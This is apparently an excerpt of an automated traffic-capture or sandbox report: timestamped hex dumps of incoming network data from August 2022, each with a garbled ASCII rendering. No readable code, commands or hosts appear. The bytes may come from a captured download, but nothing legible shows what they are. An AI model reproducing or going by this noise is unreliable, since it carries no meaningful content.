                                                                                    2022-08-21 23:57:29 UTC2INData Raw: 6d ce e4 b3 df 42 58 c8 48 c1 c2 05 d5 c0 b9 ab 3f 0a df 05 81 9d 0c e6 99 31 00 45 5c e4 d7 e6 8d b9 96 ef 23 d9 cb 8f cf fa 0d 8d f6 dd 93 80 13 0d d5 9a 54 77 60 ae 91 62 f3 cb d3 e7 d8 ba ba 49 7e 80 d0 60 e6 95 4d d8 9d fa ee 83 54 4c 0c f7 11 f7 a2 44 ce 54 eb 72 1e 7a 36 fb 32 76 ca 60 bc 78 7f ce a6 4d 80 cb bd 2e e7 ed 53 b3 d7 2f 61 dd 4a 23 ee bc 93 05 cd 43 66 5a 61 69 2c 2e a4 fc 1e b2 98 9e 64 66 1e b4 df 40 97 59 d9 0c d9 bb f7 9e 9a b5 36 5d 05 9e ee fe f2 07 5d bd 89 3a 70 9c 54 78 83 03 0e 77 2a ef 35 69 ac 0b c5 4f 40 e7 75 e5 59 98 12 26 d6 c7 48 3d 8b 81 20 32 4d 3d 43 4b f3 b2 08 54 b2 ff 2b b2 ad 3b f0 8a 1b b0 b1 35 e4 09 9e 25 dc e0 1d 85 42 8a 70 d1 c7 31 5f 8b 6d 2b e3 90 78 f0 d8 b7 0a 6f 14 34 87 9c 5b 6b 80 c7 4c df ee 4f f0
                                                                                    Data Ascii: mBXH?1E\#Tw`bI~`MTLDTrz62v`xM.S/aJ#CfZai,.df@Y6]]:pTxw*5iO@uY&H= 2M=CKT+;5%Bp1_m+xo4[kLO
                                                                                    2022-08-21 23:57:29 UTC4INData Raw: 17 6e 23 71 f3 2d 37 a0 54 11 91 c0 a2 cc 61 a3 4b f8 19 c6 10 f8 9b e4 27 66 f1 ab 27 6c 2d f1 ad f8 08 2c 24 18 63 0c 82 af 2e 0b ba 59 04 7c 46 e1 07 63 39 84 fd c4 d4 c9 6d b1 f2 41 cb ee 7b e4 3d 27 38 f5 47 46 70 82 29 c7 59 ee 00 36 9e 6d 38 a8 f5 cd d1 d6 6e be 83 47 95 7c 3a 21 7a b2 76 da 0c 6f dc d2 86 6b e4 ab f4 51 f6 1d 42 5a d1 29 bc f3 a2 7f a7 3c a1 66 f7 fb e1 5a b6 23 2e 18 e7 bf ed 4b e6 ed 83 a1 e3 bc 45 2f 3c cf 55 a9 a6 02 3e eb 77 8c 93 a6 ea 89 90 88 28 7e cd c5 fb d9 35 1e be 2d 9d ca f8 48 46 b3 69 fa 4c 2a 68 95 1c e3 12 27 9c a6 05 1e f1 bf c8 da 63 47 c4 81 d0 38 e5 e2 3e 07 39 ad c5 9e 7a 69 35 d0 1c d8 85 f8 ec c8 72 0f 28 6a b7 2f 61 9f 59 ac ac 87 8b db 51 9c b2 0f de 5d 95 ab c6 72 91 58 a8 b5 b3 a8 2a ff 18 51 86 93 34
                                                                                    Data Ascii: n#q-7TaK'f'l-,$c.Y|Fc9mA{='8GFp)Y6m8nG|:!zvokQBZ)<fZ#.KE/<U>w(~5-HFiL*h'cG8>9zi5r(j/aYQ]rX*Q4
                                                                                    2022-08-21 23:57:29 UTC5INData Raw: 80 1f b4 d9 c0 9e 59 c9 08 ce 3b 92 9c 9a b1 5e df 0e 9e 8e fa e4 87 4c bd 89 3f 75 2c 5a 78 4a 07 18 f7 37 ef 35 7c ac 80 f2 f3 40 e3 63 65 4e 85 ec 23 d2 9c 34 30 8d 01 35 0b fd 39 6b 1c ef b9 0e d3 bc 01 2a 9a b3 93 c1 8a 1b b2 84 c4 e5 0e 80 5b c9 cc 17 ff 47 0a 65 d5 d1 06 11 12 70 2b e4 8a 90 71 e3 a2 1e 95 3a ed 86 9c 5b 98 cc c7 4c d1 b5 e0 f1 d9 93 31 eb d0 d6 5e 5c 56 1f df 73 dd 66 35 7e 28 c9 f8 6c 96 05 6b f1 7f 06 a3 f8 06 d6 6d 55 4c 6e 4f 32 96 70 3f f6 0f 88 c6 e5 6d 67 0d d6 d2 66 dc 83 7f 52 2d bf 84 07 43 d7 45 b1 73 72 7d 5e cc ed e0 2b 1b 3c 3b 8d d3 a2 eb e8 7b 0e 76 78 ad 43 05 f7 b5 a4 7f ef 7e 7c ea ca 6e 3c f2 d6 d1 a4 04 9b 9b 11 fd be c2 d8 bb 7f 7d b5 df c2 d0 20 42 a8 d5 89 80 8b 5b 98 4a aa 27 ce 7a 89 c1 53 24 79 97 e6 5e
                                                                                    Data Ascii: Y;^L?u,ZxJ75|@ceN#4059k*[Gep+q:[L1^\Vsf5~(lkmULnO2p?mgfR-CEsr}^+<;{vxC~|n<} B[J'zS$y^
                                                                                    2022-08-21 23:57:29 UTC6INData Raw: 6a 84 8f e3 bd 5c f8 2d c0 2c d4 3a 13 3d 22 6d 38 af af f2 95 24 b7 21 67 d1 87 ea fa 2f 49 46 3c 94 d1 ee d4 57 94 75 ec d0 1b 61 88 0a 31 03 2e 82 bf 99 0f f8 bd c1 cc fe 56 cd 9e da 4b 79 f3 37 41 32 bb 59 31 73 7a 33 cd 19 f0 e1 e7 ec ce 62 09 47 2c b7 fd 6b 8e 5c 8f eb 87 8b cf 8e 90 9a 2e de 5d 9f 9e e8 72 90 52 76 b5 cd bc 2a ff 1c 4b f2 93 34 ec 0a 0d 60 ef 84 ad b1 6e 1f 87 f4 be 6a 2f b7 f8 58 94 4c 5e a5 09 99 fb 44 79 6a 39 c5 71 c1 64 4b b9 51 07 e0 b9 8c d7 f7 41 c5 3c 26 eb 4b 51 58 28 d1 31 47 40 10 8a 60 04 dc 3f 8c 41 75 3a 99 70 86 f7 cb 01 db b4 ba 0a 5b f8 63 78 11 ab 63 83 04 49 63 83 a0 a7 04 47 97 a8 51 62 d9 ce 5d f4 37 47 72 89 e0 e4 c5 da 61 d0 7a 6d c9 fa cd ce 6e 56 b2 42 c7 ad 39 59 c7 bf b4 2d aa d8 1c 8a 9c 18 ff 76 3e 3a
                                                                                    Data Ascii: j\-,:="m8$!g/IF<Wua1.VKy7A2Y1sz3bG,k\.]rRv*K4`nj/XL^Dyj9qdKQA<&KQX(1G@`?Au:p[cxcIcGQb]7GrazmnVB9Y-v>:
                                                                                    2022-08-21 23:57:29 UTC8INData Raw: 66 8f 7c f3 f1 78 16 32 68 2a d2 4c cd 5e 0a db 35 8f 84 37 b5 98 a0 e7 ef 02 f4 17 dd d8 65 e7 7b 7a 11 4a a7 8f 0d 9a c3 9e 98 72 53 03 47 df e4 cc 12 e5 3d 4f 40 d3 88 ae ec 85 0f 16 06 be 43 05 f3 ac 5a 9a 8e 47 1c f1 34 91 20 f6 d6 d6 b2 e7 9a b7 12 f1 85 ce df 98 74 83 b4 ea c0 fb 34 52 04 28 76 79 a3 73 bb 4a b1 1d ee 1d 83 c0 59 50 22 97 e6 4e 49 90 c4 d7 c7 d2 dd 3d 82 14 b9 49 42 0b 3d 8e 82 ab aa 6b d3 30 6f fa 36 23 57 63 e6 a2 39 ab 58 88 f0 25 66 57 30 2f d6 bd a9 39 c1 c0 00 d3 38 0d f1 cb f0 94 e6 f7 7e 25 88 4d af 8f 86 7f 50 fa fb 5e 56 d0 36 e8 bc 5e 7d 8d 3a 01 24 b1 ec c9 0c 33 91 01 46 fb 50 4f 0c 3f 31 9f de bf ab b7 0d 8b 9f 7d c6 0c 34 87 9b 75 ca ae 12 73 19 e7 dc 39 37 a1 f2 28 d5 d8 a4 d5 bb bc 6a c4 1c 97 12 f2 90 da 84 61 f1
                                                                                    Data Ascii: f|x2h*L^57e{zJrSG=O@CZG4 t4R(vysJYP"NI=IB=k0o6#Wc9X%fW0/98~%MP^V6^}:$3FPO?1}4us97(ja
                                                                                    2022-08-21 23:57:29 UTC9INData Raw: 81 48 a5 09 45 d2 c0 7b 65 3f cf 02 e9 64 4b be 51 31 9a b5 a0 d5 f3 6d 89 2d 20 84 4d 42 5c 14 ad 04 47 40 16 8d 9a 1d 5c 2e a0 4a 6e 3e ea 69 e6 db fa 1d c4 c8 86 0a 4a fa 6d 6c 80 90 4f 8e 0b 47 6a 83 89 a7 04 47 24 b1 39 5b dd ce 48 d8 ae 56 8c 8e e4 cc cc c5 7b a7 6b e9 c9 fc 4b 7c 71 42 a5 57 c1 d3 0b 46 d7 47 aa 08 29 c9 03 87 8a 23 75 67 30 2a e5 5b fe c4 e5 9b 56 93 d8 df cf ec 84 c1 f8 8d 91 da df bc 20 24 a5 af 81 45 73 75 8a 39 43 2f c9 da f8 fb d9 a7 49 74 ac 60 7f e9 80 61 c6 8c fe fb bf e8 65 a1 f9 6f d1 8a 51 ca 6d 68 5b 09 7a 29 ea 0b 72 ca 62 88 64 72 2d a6 61 97 ce a2 24 de c1 05 b1 d1 46 4d db 4a 29 85 6e 94 05 c7 e5 87 41 6d 6d 2c 3d b7 66 e8 b3 b4 82 45 8b 37 ff d9 c0 94 55 cb 0a e6 c4 fc 9e 9c 99 6d dd 0e 94 4c e1 f7 83 51 ac 8d 21
                                                                                    Data Ascii: HE{e?dKQ1m- MB\G@\.Jn>iJmlOGjG$9[HV{kK|qBWFG)#ug0*[V $Esu9C/It`aeoQmh[z)rbdr-a$FMJ)nAmm,=fE7UmLQ!
                                                                                    2022-08-21 23:57:29 UTC10INData Raw: 47 d0 2d 7b c6 a0 30 43 7a 86 cb 38 87 50 8b a4 1d 04 a3 cc bf 83 97 b2 03 c8 c7 65 c7 10 5c ec cb f6 93 43 0a 7f 25 8f 52 93 5b ae e7 5a d2 c2 76 cf d6 1e d3 d3 c4 7b a5 9e 06 4b 20 c4 fb 06 3f 9f 3d c0 6c 52 45 22 81 bc 98 d4 97 9e a4 08 9c 91 6c e8 06 27 87 9d 10 a9 bf 17 6e 23 7a 8a 11 15 a2 50 3f f8 3a a3 c6 b9 c2 24 d0 34 cc 1b 2c 84 e4 24 66 f1 ab d1 de 51 e9 ab f3 24 7c 30 18 69 d6 95 80 46 0b bb 43 7a 6a 46 e1 05 4f 7b b5 e9 d6 c9 cd 71 98 aa 71 c9 e4 db e8 15 0a 18 f5 4d 7f 20 b0 29 cd 8d e5 56 c1 9c 6d 34 f3 54 cf d1 da 75 d9 a9 84 95 76 23 28 62 d9 9a be 0e 65 c9 aa b9 41 f5 a9 f4 d2 f6 1d 42 50 ff 29 bc f8 99 1e b4 38 c8 b7 98 be eb 72 08 32 2b 0f 8d 54 8c 54 e0 0f 64 a1 e3 b7 39 33 2d c6 49 ba 2b 15 58 35 61 10 88 82 3f 41 00 88 27 4b dc 48
                                                                                    Data Ascii: G-{0Cz8Pe\C%R[Zv{K ?=lRE"l'n#zP?:$4,$fQ$|0iFCzjFO{qqM )Vm4Tuv#(beABP)8r2+TTd93-I+X5a?A'KH
                                                                                    2022-08-21 23:57:29 UTC12INData Raw: b8 0f 17 b6 ab 80 5e 68 61 97 c3 42 12 c0 ce 19 f1 8b aa 4b 0f 83 c2 60 e2 95 0a 1c 9d fa ee a5 08 77 89 f7 00 f5 96 af cf 78 e3 7a 09 7e 36 fd 95 59 ca 73 8d 71 62 c0 a3 4d 91 c3 a2 23 08 c4 29 a0 de 01 25 d9 4a 25 85 02 94 05 c7 6a c0 50 70 7a 28 2c a2 78 0e 4c 99 b6 54 b4 96 b6 d9 c6 b6 85 d9 08 c4 1b a6 bd 9a b1 52 00 0e 9e e4 f1 fd 94 55 bd 98 3a 79 12 a7 79 af 17 1a 8c 0f ef 35 69 a2 e4 b7 4f 40 e9 7c 6a 5a 9c 12 33 fa 86 b4 3c a1 02 26 21 49 39 7a 18 ee a2 f0 d5 8c fd 00 b3 8c f8 1d 75 e4 9e 99 cf f6 39 9a a5 51 e0 1d 81 71 0a 65 c0 d1 26 4d 33 fb 2b e3 94 6e 61 cb af f4 6a 10 c0 ae 59 5f eb 9e ef 92 db c6 bf fc c0 8a 3f f4 c8 d9 43 a5 48 3a 24 65 db 71 20 15 7e d8 fc 7d 77 0e 4c f6 71 14 c7 f2 36 c1 42 ca 46 61 55 cb 8e a2 3b f1 45 bb f4 e1 6d 70
                                                                                    Data Ascii: ^haBK`wxz~6YsqbM#)%J%jPpz(,xLTRU:yy5iO@|jZ3<&!I9zu9Qqe&M3+najY_?CH:$eq ~}wLq6BFaU;Emp
                                                                                    2022-08-21 23:57:29 UTC13INData Raw: 7a 20 bf e1 15 4f 32 fa e9 c6 d4 6b 71 f2 a0 40 c7 e4 a5 e8 15 11 08 f2 4d e9 5c 82 29 e4 87 ee 6f 5a 47 6f 32 86 9d e7 0b d2 79 d7 ca 6f 4e 74 29 23 78 b1 4f b9 18 1c 3d ac 92 61 f7 a9 b3 ed f7 1d 4e 37 90 3f af fd a2 e0 a4 3c a1 7c eb 5a e1 5a b6 23 22 18 eb 9b e3 bc ea 60 a6 ac 3d b1 47 2f 01 c1 52 b8 55 4e 37 fc 6b cc 93 a9 fb f0 e5 99 21 6d b4 b3 ea d0 25 1b 32 04 9e d0 ee d4 46 aa 1a 4a d0 3b 6b fc 71 7f 03 2f 91 ba 88 05 97 4b c1 cc f5 6f 3d 9e da 2e 68 f9 58 f4 32 bb 53 a7 af 78 33 c7 76 1d e1 fa e6 a1 8d 09 47 26 a4 23 7a 82 48 eb 36 85 8b d7 97 1d 9d 22 de 5c 8c 92 f9 63 87 7a 29 b7 cd ba 88 ee 0d 6e db 69 35 de 0d af 71 f2 90 b9 a5 5b 87 87 f5 af 72 3a b7 88 50 87 40 58 a9 1d a0 0d c2 7b 6c 28 42 05 f4 64 4a ac 53 10 8f a3 a4 08 f1 6d 92 8f 31
                                                                                    Data Ascii: z O2kq@M\)oZGo2yoNt)#xO=aN7?<|ZZ#"`=G/RUN7k!m%2FJ;kq/Ko=.hX2Sx3vG&#zH6"\cz)ni5q[r:P@X{l(BdJSm1
                                                                                    2022-08-21 23:57:29 UTC14INData Raw: 65 49 92 c2 2e fe 90 51 15 99 01 31 38 65 99 6b 1c fb c6 02 d4 a0 e4 38 bb a5 ab fb 1a 37 be 88 c1 fd 93 b0 b4 c8 e0 17 8a 42 86 34 d1 c7 34 42 0c 6d a7 b2 94 6e 71 d9 9f f3 6b 3c c4 bc 04 a3 14 67 d6 46 cf ee 51 f3 d9 9f 22 79 de dd 5e 5a 5a 19 30 7d e7 78 be 3e 7e c9 f9 c4 98 00 77 e7 f4 4d 5d f9 2b 70 57 c5 4f 73 c3 64 8f 8e 3f 78 19 af f3 f1 79 76 3f 41 d2 61 c1 5b 6f 74 3b 8f 6a 05 44 ca ad 3d 58 53 03 4c d8 f9 f0 14 7d 3d 45 94 a7 ae ef f0 9e 02 c8 17 af 49 29 ff bd 50 0a b6 47 1c 14 5a cc 20 f9 dc 0a b0 eb 9d d8 2e ea b5 c4 cc ac 77 8a db ce c0 fb 23 69 93 02 90 7d a1 5d 89 42 a0 13 ee 5c 83 c0 59 0e 6d 97 e6 0e 5e 97 ec 41 c5 d2 db ac 17 16 b9 46 33 8b 3d 4c 8a c4 3c 7a d3 3a 68 d2 a0 21 57 76 b9 36 39 eb 52 a0 a1 2d 66 5d 22 56 8f 96 b2 33 cc d0
                                                                                    Data Ascii: eI.Q18ek87B44Bmnqk<gFQ"y^ZZ0}x>~wM]+pWOsd?xyv?Aa[ot;jD=XSL}=EI)PGZ .w#i}]B\Ym^AF3=L<z:h!Wv69R-f]"V3
                                                                                    2022-08-21 23:57:29 UTC16INData Raw: 79 a1 31 89 bc 99 07 e7 ad 3f cd d3 5d ca 83 a4 33 79 f3 33 ba 2d b5 55 8f 7b 67 cd c0 35 fa e6 ed c4 8c 63 09 41 8e a9 23 6b 86 43 ca 15 86 a7 da 88 89 e4 0f de 5d 9b 21 f7 78 9d 52 7e ab 33 bd 06 f4 1b 61 db 6e 35 de 0d af 7f ea 88 ad b9 6c 14 79 f4 89 42 2c ac a0 11 94 4c 43 af 1b 88 fb 3f 7a 6a 39 e7 4e f4 64 41 1d 5d 0d 92 b5 84 cb 0d 6c b8 27 27 83 73 ad 59 2c b8 a4 5a 4c 16 94 81 15 5c 2e a0 4c 0f 01 67 71 e2 5b cb 10 dd df 9d 1b 57 fe 7a 68 80 90 4f 81 15 54 65 a3 3a b4 fa 40 aa ac 01 4d e1 b8 a7 23 4e 6f 72 8f db f2 c6 da 11 bf 43 6d f8 fc 4d cf 78 5b 8e 34 c1 c2 0f 59 ce a3 55 25 0b da 62 a7 9d 0b f5 08 35 2d 47 4e 91 f0 e1 9b 43 90 59 4e 0f c0 8f c2 cc b9 97 d7 df b1 99 c6 b7 87 85 43 5d 76 89 c7 4b 14 3a d2 cb f2 bf b7 49 7d b1 3c 61 ca 97 4e
                                                                                    Data Ascii: y1?]3y3-U{g5cA#kC]!xR~3an5lyB,LC?zj9NdA]l''sY,ZL\.Lgq[WzhOTe:@M#NorCmMx[4YU%b5-GNCYNC]vK:I}<aN
                                                                                    2022-08-21 23:57:29 UTC17INData Raw: 4d cc e9 cc 28 e7 3d 43 b6 f0 a2 ef fa 05 06 16 06 ba 9e 08 f7 ac 5a 7c 90 4a 2f 38 4b 98 20 f9 d2 fe a7 f8 9a b1 3b c9 b5 c2 d5 24 7c 83 b4 f7 be f2 25 7a 93 54 6b 7f a1 5f b0 69 b1 17 cc fa 8a c0 53 20 b0 4c e5 4f 42 95 f3 33 f6 cb a5 1c 17 16 bd 67 27 89 3d 88 a0 e7 3c 6b d9 ba 61 d2 a0 25 8a d8 8a 35 39 a9 4d d1 92 3c 18 54 33 40 80 95 be 31 cb c1 2e e4 10 5c f9 4b ff 82 6b f4 a3 ba 8a 59 bb 99 b1 95 63 e3 8f 7f cf d0 32 ca cb c6 7d 8b 18 25 4b 2a e6 49 0f 3f 99 11 b3 ed 51 4f 0a 24 a3 eb ed a6 d4 ad 08 9a 9e 43 d9 26 25 81 b3 5c 68 bf 1d e4 06 6b 8d 3d ea c3 53 39 d0 c2 bd b2 8c b4 10 d9 34 c6 14 da 8c ce 09 60 d9 82 f9 6c 59 69 a4 f8 0c 56 ed 5d 60 08 95 85 73 7e 89 4a 04 63 46 e1 07 67 29 f8 e9 c2 fc ee 71 99 bb c1 c2 e4 a5 ec c8 2d 3b f5 4d 6c 41
                                                                                    Data Ascii: M(=CZ|J/8K ;$|%zTk_iS LOB3g'=<ka%59M<T3@1.\KkYc2}%K*I?QO$C&%\hk=S94`lYiV]`s~JcFg)q-;MlA
                                                                                    2022-08-21 23:57:29 UTC18INData Raw: 65 f1 d2 db fb 14 f7 db 82 19 6b fa 72 c4 7f 91 63 b6 02 58 74 bd 36 a2 3c db 87 ae 2a 48 c8 c9 46 d6 4f 44 5e 99 c0 e2 c4 db 6b bf 6b 7d c8 fc 47 f6 7a 57 b6 59 ec e3 10 52 d4 be ab 35 20 df 11 74 9c 27 fa 76 36 15 37 45 ef d7 fe 95 54 90 c3 30 c9 df 83 36 e1 df 87 a4 eb b8 82 3c a5 ad 9e 59 64 6d 84 d6 45 1e 3a d2 cb f9 ae 83 03 75 a8 c2 7e f5 94 65 d7 9a e2 1a a8 3a 6e 8e e1 51 c9 8b 51 ce 4d fe 5d 09 6b 31 ea e6 77 e6 70 94 68 78 d3 b6 4a 9e 39 bc 02 c1 cc 00 b6 5b 38 e1 db 48 4c ff c2 94 0f e5 51 99 4f 74 4c 01 29 95 6d 12 99 92 e3 5d 9c 1f b6 a8 d1 9e 59 db 1b cb 29 f8 e5 a7 b1 21 d9 8a f1 b6 fa e4 81 4e b4 9a 39 66 0d 5e 64 7d 06 34 fe 5a dc 35 6d be 86 d7 5c 47 e3 72 62 56 93 ec 23 d2 89 42 1d 88 00 31 32 65 29 6a 1c fb 9a 1a d5 a0 f5 12 0a b4 bb
                                                                                    Data Ascii: ekrcXt6<*HFOD^kk}GzWYR5 t'v67ET06<YdmE:u~e:nQQM]k1wphxJ9[8HLQOtL)m]Y)!N9f^d}4Z5m\GrbV#B12e)j
                                                                                    2022-08-21 23:57:29 UTC20INData Raw: d0 bf 74 a0 f2 37 e2 d9 c6 06 c4 30 06 4f 02 8a c9 06 39 bf 3f 6e 6c 52 5c 3a 22 bc d0 df bf aa 9e 08 9a 8b 7d cc 1c 1e 86 9b 7f 68 b7 08 69 f1 6a a1 33 35 a3 78 1a d1 c0 a8 d9 b1 a1 6e d8 2c 38 11 de bd cf 21 42 f0 a1 f3 4c 5b ea ad f8 55 17 36 18 63 08 c9 87 6c 0b 7c ac 85 95 80 1e fc b0 f4 05 16 3b 12 32 8e 66 bb 41 cb e4 bc e4 15 02 27 fc b3 6f 72 94 2a e5 a2 ef 7e 78 9c 16 7b 80 96 cb f9 c4 78 d1 cc 6b 82 69 23 29 6b be 40 40 0f 43 df 87 0f 74 ed a3 9b 1f e9 11 b6 25 b9 08 be 82 c3 1a a5 38 a4 59 bc bf e1 50 bf 18 0e 08 e2 99 8f 7c cc 61 ac ab cb da 56 26 2b e0 5c bc 36 13 3f e6 9f 11 ae a6 f0 e4 44 99 21 63 d0 42 e6 d0 27 17 29 c2 95 fd e6 ec 03 45 8a 13 cf 37 6d 88 02 64 fd 2f ae b5 9e 23 f1 bc cd cc f7 4b 33 9f f6 0e 7b 88 7e 18 32 bf 5a a7 57 7b
                                                                                    Data Ascii: t70O9?nlR\:"}hij35xn,8!BL[U6cl|;2fA'or*~x{xki#)k@@Ct%8YP|aV&+\6?D!cB')E7md/#K3{~2ZW{
                                                                                    2022-08-21 23:57:29 UTC21INData Raw: 3c 23 34 75 dc 5c 80 7c 78 5d 10 4e 56 d0 67 b4 fc 1b 19 99 2d 28 e1 dd 40 fd fe e6 bc 28 cd 47 92 43 56 93 2d 2c b5 76 3e 9c 98 9a 46 42 1f b2 f3 c0 9e 58 c9 08 ce 3b fd 9e 9a fd 6d dd 1a 83 ee fa e5 9c 61 be 89 12 66 1c 59 67 83 07 09 f5 27 c7 0c 6c ba 81 cf 58 96 79 68 62 4d b0 2b 23 fe 9a 5c a7 87 df 23 1a 60 39 6b 16 d9 48 0f d4 a6 f5 03 98 b4 bb e9 54 1b b2 b3 ce f5 09 98 a5 c8 e0 1d 99 4c 0a 77 cc c7 35 48 10 4b 28 e3 55 6e 70 cf f5 0a 6b 2d b0 a7 9c 5d ef b0 a0 4c db cc c1 cd d9 99 3a ff de f5 37 5b 49 1c 4e 18 f1 6f 39 16 69 a6 93 66 89 05 67 d1 68 3b 5d f9 45 be 46 ca 5d 62 58 5a e2 8e 3e d0 0f bf d5 8a 03 61 17 d7 d5 49 2c 7f 7e 78 40 d7 8f 07 4e cb c5 b6 5f 53 07 22 a3 ed e4 36 e2 52 30 9e d3 a8 e3 f8 f1 90 16 06 bf 2c 3f f2 ac 50 56 67 45 1c
                                                                                    Data Ascii: <#4u\|x]NVg-(@(GCV-,v>FBX;mafYg'lXyhbM+#\#`9kHTLw5HK(Unpk-]L:7[INo9ifgh;]EF]bXZ>aI,~x@N_S"6R0,?PVgE
                                                                                    2022-08-21 23:57:29 UTC22INData Raw: 95 7c 01 6f 6a b6 54 92 37 73 d7 ac 9b 73 1a ae b7 1f de 56 49 24 9f 23 a5 f4 8a 13 bf c2 a6 5d 9c 95 c2 41 b1 30 22 1e 1c 92 a0 56 f2 6d ac a8 f5 43 57 0a 2f d1 4e b1 33 0e c9 fd 4d 12 a9 ad d9 0c 04 8e f7 6b d3 5f 64 67 1d a0 36 16 8f e1 ec d4 0d ba 75 ec 96 3b 61 99 22 67 02 2e 88 df 9b 0e f8 aa ca e4 e7 57 cd 94 b5 f1 79 f3 3d 12 35 93 87 8f 73 70 3f c9 0a f6 f7 e9 e9 e5 78 18 41 3d b2 b5 66 87 33 1c eb 87 81 d7 a1 96 93 4d 9e 5d 9f 89 f9 77 86 84 65 b0 dc b9 3b f9 92 ce c1 4e ea d1 2e 25 4d e3 84 a7 a2 77 37 a9 f5 a5 50 f5 b7 a2 5a 94 4d 59 a5 09 88 d3 c0 7b 20 75 cf 0d e9 64 4b be 59 31 9b b5 fb d7 f3 6d d3 2d 20 84 25 46 58 2c ba 2a 28 3e 0e 9c 9e 01 dc 3b 8c 41 75 3a 4f 41 e6 db f1 06 f3 87 aa 46 5a fe 78 68 56 dd 62 83 08 52 77 ab 05 a5 05 41 86
                                                                                    Data Ascii: |ojT7ssVI$#]A0"VmCW/N3Mk_dg6u;a"g.Wy=5sp?xA=f3M]we;N.%Mw7PZMY{ udKY1m- %FX,*(>;Au:OAFZxhVbRwA
                                                                                    2022-08-21 23:57:29 UTC24INData Raw: 3f 4e 0f 06 78 e3 94 6a 6f c5 bb 0a 63 2a 30 87 b0 5f fc 94 c7 44 c4 cc 4b f0 f5 9b 10 f1 e1 80 a1 a4 b6 11 0b 61 c1 6c 33 b0 7e c9 f8 2a 89 0f 71 e7 6b 18 65 6b 2a d2 46 ca 46 61 51 cb 8e a2 35 d3 0a dd aa e5 6d 65 08 d4 c1 65 cb 6c 7a 65 d1 a6 a3 02 5d c6 a7 a3 5b 53 12 49 d1 13 e5 10 e9 35 46 88 fb 2f ef f0 83 02 08 15 ba 43 14 f7 bb a4 7f a3 44 04 06 31 91 31 fd ca 28 b3 d6 96 b5 0a ec c6 fe de a4 7f 8f a9 e0 c4 fb 34 7e 8e d4 77 53 a4 4c 92 50 a2 13 c6 6b 87 da ad 25 41 92 cd 92 59 84 e8 43 d4 d6 c3 eb 16 3a be 4c 26 b8 9f 97 9b c0 3c 7a d7 2c 96 d3 8c 22 40 76 8d 35 28 af 4d a9 5f 24 4a 5f 18 45 bc d4 56 cc 34 ce 2c c7 10 5c e0 fb f4 82 20 f0 7e 25 c4 59 bb 8a ac 88 0b fb f1 7c e2 df 35 f5 fd cf 55 77 31 06 4d 59 b0 c8 06 35 e3 66 eb 6c 52 49 01 21
                                                                                    Data Ascii: ?Nxjoc*0_DKal3~*qkek*FFaQ5meelze][SI5F/CD11(4~wSLPk%AYC:L&<z,"@v5(M_$J_EV4,\ ~%Y|5Uw1MY5flRI!
                                                                                    2022-08-21 23:57:29 UTC25INData Raw: 85 f0 81 8f 90 9e ac 69 e5 48 ed 6d 74 ff d7 19 28 cd bc 2c e0 0c 6a f6 93 25 db 1c f3 61 cf 87 b5 a2 76 1f 96 f0 b3 a4 2a 9b 8b 4d 87 49 49 b4 0c 97 c4 3e 7a 46 3d e4 07 cc 82 b6 40 bd 2b 9e a6 bc d2 f3 68 96 2d 20 c6 5b 51 49 2e c5 56 47 40 12 b1 95 2d 53 2d 8c 47 02 70 66 71 ec a1 88 48 dc db 88 06 4d f4 4a ab 7f 91 63 81 79 08 65 ab 21 a3 2c 2a 87 ae 20 5b c9 df 49 b2 91 15 39 8e ca a8 85 1d 6a bf 43 6f b2 ac 4d de 6a 50 a8 85 e9 ae 0e 59 cd 99 ab 2c 27 c0 43 9c 63 0a e7 99 31 3f 40 46 94 87 e1 9b 43 91 dc 2b 18 e8 e3 c9 e0 f9 9f d7 dd c3 d2 38 b6 af 87 4b 7b bc ac ac 43 03 ce c0 e9 f2 dc ea 49 74 ac c4 7f f6 45 4d ad 9c fa ee ba 13 66 f6 a7 11 f1 8e 57 d1 40 3b 72 62 7b 36 f7 76 65 ce 71 f7 2b 7f d3 a3 4b 9f df 6b 06 9d c4 05 bb b9 3a eb d9 31 73 ea
                                                                                    Data Ascii: iHmt(,j%av*MII>zF=@+h- [QI.VG@-S-GpfqHMJcye!,* [I9jCoMjPY,'Cc1?@FC+8K{CItEMfW@;rb{6veq+Kk:1s
                                                                                    2022-08-21 23:57:29 UTC26INData Raw: b4 f3 ca 27 27 2a f8 b8 76 7f a7 4a 9c 25 23 17 c6 7c 81 90 28 69 6d 97 e2 67 03 97 ec 49 cc d0 8b 6e 5a 16 b9 4b 19 f1 3c 8e 82 c6 3e 3b a8 77 68 d2 a4 23 07 1e db 35 39 af 7a 2c a1 25 60 0c ed 6b ac 90 a9 33 c1 d1 0d ef 3e 5c f3 c1 28 9d 62 d8 45 25 89 53 97 9d a7 cf 11 fa f1 7c c7 f8 0d e2 d3 ce 51 8b 38 2e 0a 2a ec c3 da 28 b3 12 44 6c 52 4e 22 26 bc 9a de 85 aa f5 83 9a 94 6b c0 24 25 87 9b 52 68 15 c0 64 01 76 8d 39 36 a2 50 14 d0 78 47 c6 a2 ad 6e d0 34 d5 20 f6 96 0a 09 66 f1 f9 f9 6c 42 ff be fc 34 f8 30 18 63 08 84 83 7b f5 bb 7f 79 72 55 e5 03 5e 36 e1 17 c5 f8 c6 77 8f 99 2d ca e4 af e4 09 19 3c f5 5c 6a 44 7c 28 e1 95 ec 05 3c 9e 6d 36 86 80 d7 be ed 78 d1 cc 61 8e 65 2d 25 7a b2 47 40 0f 43 cc ae e9 25 e4 af 9f 14 e9 07 9f 4a 10 3f d3 8b 8b
                                                                                    Data Ascii: ''*vJ%#|(imgInZK<>;wh#59z,%`k3>\(bE%S|Q8.*(DlRN"&k$%Rhdv96PxGn4 flB40c{yrU^6w-<\jD|(<m6xae-%zG@C%J?
                                                                                    2022-08-21 23:57:29 UTC28INData Raw: d3 93 39 de 6e 5c a9 47 d2 c4 0f 48 c1 a6 a0 da 26 ec 17 aa 9d 03 f1 67 23 28 58 48 fc d1 e1 8a 41 88 d9 df cf ec 94 ca 9b bd 8c da db 98 82 b9 b6 ab a9 28 76 6a 8e d1 5a 6c b0 d3 e7 fa b8 a1 5a 72 a8 d3 66 f9 9d 9b c7 b1 e2 e6 d2 58 64 8d f3 00 f5 a2 2d cf 54 e7 4c 11 15 42 fd 18 7c d5 7c 9f 7d 7f c2 a1 52 90 39 bc 02 d4 c7 7e ff d7 29 e5 d9 49 58 8b c3 94 01 a2 d8 98 4f 78 41 57 2d b3 76 00 a8 f7 ee 4c 9c 15 ab c8 d3 98 59 c8 0e d4 c5 fc b2 92 89 b5 dc 0e 9e f5 e9 e2 87 40 bb 96 23 98 1d 75 6c 81 7c 56 f7 24 eb 3c 7b b3 05 7d 20 34 e3 63 6f 56 86 01 24 fe 81 4c 22 87 ff 30 1e 42 3a 